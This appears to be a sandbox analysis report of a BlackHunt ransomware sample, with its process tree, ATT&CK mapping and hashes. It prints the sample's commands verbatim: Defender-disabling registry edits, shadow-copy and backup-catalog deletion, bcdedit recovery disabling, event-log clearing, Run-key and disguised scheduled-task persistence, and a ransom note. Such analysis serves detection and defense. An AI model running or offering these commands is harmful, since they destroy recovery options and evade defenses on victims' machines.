59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 51 PID 2848 wrote to memory of 2708 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 51 PID 2848 wrote to memory of 2708 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 51 PID 2848 wrote to memory of 2708 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 51 PID 2848 wrote to memory of 2524 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 53 PID 2848 wrote to memory of 2524 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 53 PID 2848 wrote to memory of 2524 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 53 PID 2848 wrote to memory of 2524 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 53 PID 2848 wrote to memory of 2464 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 61 PID 2848 wrote to memory of 2464 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 61 PID 2848 wrote to memory of 2464 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 61 PID 2848 wrote to memory of 2464 2848 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe 61 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe"C:\Users\Admin\AppData\Local\Temp\59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2132
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:964
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:824
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1868
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe" /F2⤵PID:2984
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe" /F3⤵
- Creates scheduled task(s)
PID:3744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1956
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2808
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:804
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:684
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:708
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:892
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:672
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:240
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:324
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1068
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1996
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3232
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3100
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3884
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:640
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:240
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3984
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2136
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3728
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:896
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3608
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2580
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3652
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2520
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1184
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3384
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3312
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\59456ca5e5a809d4f778f826f1aeae81fe621f8d0a1b5b9972d0c773ccc11b46.exe"2⤵
- Deletes itself
PID:4072 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1904
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4076
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2496
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2528
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2728
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20842275331037971602-537895581-1321422816430772455-26661656-1647474083-932553570"1⤵PID:3760
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:3824
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3368
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56a513841ae1afdb8937909229c62b6c6
SHA10d181aa6042b7973e1b09daa7668cbde440bc21f
SHA2562eb9ac589bdce37379c156b52740d61b29752a8880424bc5130a42a793f9b7cb
SHA512ac3de1a1863aa78ba1dfede0155bd5d7ae9f6b54d9eedd095c09b0d42b444e4198f29e96bed03951e031b57e527e16ccea4d1286642fcaa9be4e46fc7e1f1579
-
Filesize
12KB
MD519a8e36ef886ac39085039aa67484b0e
SHA1fd2edecbc6c0d948e6bb97b0bb852af0b18db2c1
